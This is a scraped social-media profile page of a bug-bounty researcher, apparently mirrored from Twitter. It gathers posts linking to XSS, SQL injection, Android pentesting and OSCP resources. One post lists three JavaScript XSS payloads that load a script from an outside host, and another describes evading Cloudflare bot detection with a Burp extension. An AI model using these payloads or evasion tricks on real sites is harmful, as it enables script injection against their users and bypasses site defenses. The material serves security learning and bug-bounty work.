Olivia
Online
Hasan Ali
@Hasan_ethical
Security Researcher Currently working at BugCrowd and Hackerone
Joined July 2019
470 Following
290 Followers
1.2K Posts
Stored XSS in markdown via the DesignReferenceFilter
Read Disclosed Report : https://t.co/hATe8NqWCZ
Report Submitted by vakzz
Bounty 16000$
10 YouTube channels you may find useful for cybersecurity and ethical hacking:
1. @NahamSec — https://t.co/SAfD3nxA2G
2. @InsiderPhD — https://t.co/8Ryrh18pGt
3. @ippsec — https://t.co/z0p6XwCoYN
4. @_JohnHammond — https://t.co/1d607Q41rx
5. @ctbbpodcast — https://t.co/LfCdbltDy3
6. @lostsec_ — https://t.co/8UirZ86jTc
7. @thexssrat — https://t.co/dADe1h3tNw
8. @amrelsagaei — https://t.co/GbWfAfTi2I
9. @rs0n_live — https://t.co/o2kgP7qrKe
10. @zack0x01_ — https://t.co/HU5qIdHTEy
#bugbounty #cybersecurity #hacking #infosec #ethicalhacking #pentesting
Built a small project over the past few days: OSCP DB
A curated database of OSCP-related repositories, filtered to focus on updated and relevant resources instead of outdated material.
Repo:
https://t.co/ngppzoSvr2�
Explore it:
https://t.co/nAoMIWOmBB�
preparing for OSCP
Good morning hackers,
Read my New write up about how I got a full SQL Injection, with bypassing server side,Waf with new tecnic:
https://t.co/023t040qOT
Hope you will enjoy🥳
#bugbountytips #hacking #bugbounty #cybersecurity
$700+ bounty Alone from android apps, self hosted hidden programs, moving to Android bug bounty in 2025 i think is a really good idea
#bugbounty #bugbountytips
Cloudflare has recently started blocking proxy tools like Burp Suite by identifying their unique TLS and request fingerprints.
If you encounter this issue, install the “Bypass Bot Detection” extension from the BApp Store. This extension spoofs Burp’s TLS fingerprint, making it appear like normal browser traffic and bypass it.
Hello!
Just published a new research with ( @sml555_ , @codecancare) 🍻
Who Needs A Blind XSS?
https://t.co/bUpFj1p0Mh
#CyberSecurity #BugBounty
In the latest episode of #TalkiePwnii, @pwnwithlove kicks off a brand-new Android hacking series! 📱
Learn how to set up Genymotion, Android Studio and the essential tools to start hunting on mobile.
Ready? 👇
#BugBountyTips #YesWeRHackers
https://t.co/2iQTDnyY0p
Deep dive into Android Pentesting
Covered everything from static & dynamic analysis, Frida, Drozer, SSL pinning bypass, deep links, broadcast receivers, ADB, and more.
If you're into mobile security, this one's packed with real-world scenarios & tools
https://t.co/FGoBd8kuSd
SQL Injection — The Most Practical Guide for Beginners
https://t.co/kmP3ad1NRe
#bugbounty #bugbountytips #bugbountytip
Noticed Android apps getting only 5 reports while the web gets 150? 📱
Far fewer hunters tackle mobile targets because setting up a mobile testing environment is a pain. Let's change that!
Read our guide to build your Android lab once and for all 👇
https://t.co/A7EAPoKf3U
https://t.co/IvaYEg6dzI
SSL pinning blocking your traffic?
Medusa by @Ch0pin comes with ready Frida scripts for common bypasses, with many modules including ssl unpinning to test against pinned apps.
Full setup guide 👉 https://t.co/A7EAPoKf3U
#BugBounty #BugBountyTips
@ismailsntrk7 Interested
🚨 New Writeup Alert! 🚨
"Beyond the Shell: Advanced Enumeration and Privilege Escalation for OSCP (Part 3)" by Diasaddy is now live on IW!
Check it out here: https://t.co/CkPfT59rdf
#windows #informationtechnology #cybersecurity #informationsecurity #infosec
Improve your #BugBounty reports
Using a Remote #XSS Call
1. import('//X55.is')
https://t.co/44PpUdSoC1
2. $.getScript`//X55.is` (requires jQuery)
https://t.co/ZQyAdexV0F
3. appendChild(createElement`script`).src='//X55.is' https://t.co/5u88JwaYwE
#hack2learn #hack2earn
We've provided guidance, tips, and gathered resources you can use to prepare for the #OSCP.
All in one place.
Download the e-book: https://t.co/f9dsvvEILl
Spread the news by tagging a current or future PEN-200 student!
🚨 OSCP Practical Notes 🚨
https://t.co/RSrWUoPXnb
#bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #infosec #cybersecurity #pentesting #redteam #informationsecurity #securitycipher #technology #coding #code #recon #ai #llm #owasp
“How to Learn Manual SQL Injection for OSCP(Step by Step)” by ZeusCybersec https://t.co/obGfYThXdQ
Last Seen Users on Sotwe
Most Popular Users
Elon Musk 
@elonmusk
240.6M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.7M followers
Cristiano Ronaldo
@cristiano
110.4M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.6M followers
NASA
@nasa
92.2M followers
Justin Bieber
@justinbieber
90.9M followers
KATY PERRY
@katyperry
87.6M followers
Taylor Swift
@taylorswift13
81.4M followers
Lady Gaga
@ladygaga
72.9M followers
Kim Kardashian
@kimkardashian
69.7M followers
Virat Kohli
@imvkohli
69.7M followers
YouTube
@youtube
68.7M followers
Bill Gates
@billgates
63.8M followers
Neymar Jr
@neymarjr
62.5M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
X
@x
60.8M followers
Selena Gomez
@selenagomez
60.7M followers